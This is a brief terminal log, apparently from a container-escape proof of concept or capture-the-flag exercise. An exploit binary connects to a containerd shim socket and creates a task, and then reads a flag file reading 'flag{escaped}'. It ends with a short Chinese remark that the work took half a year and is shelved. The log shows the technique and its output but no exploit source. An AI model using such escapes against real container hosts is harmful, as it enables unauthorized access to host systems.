bin    etc    home   media  opt    root   sbin   sys    usr
dev    exp    lib    mnt    proc   run    srv    tmp    var
/ # ./exp
connecting to unix:///run/containerd/s/88552ed7ac5fb857627ffeabe8b98d2197fda3d27779ff5cc0febdb6d728dc17
created task: CreateTaskResponse {
    pid: 660,
    special_fields: SpecialFields {
        unknown_fields: UnknownFields {
            fields: None,
        },
        cached_size: CachedSize {
            size: 0,
        },
    },
}
/ # ls
bin    etc    flag   lib    mnt    proc   run    srv    tmp    var
dev    exp    home   media  opt    root   sbin   sys    usr
/ # cat flag
flag{escaped}

(大半年就搞了这么点, 暂时搁置了)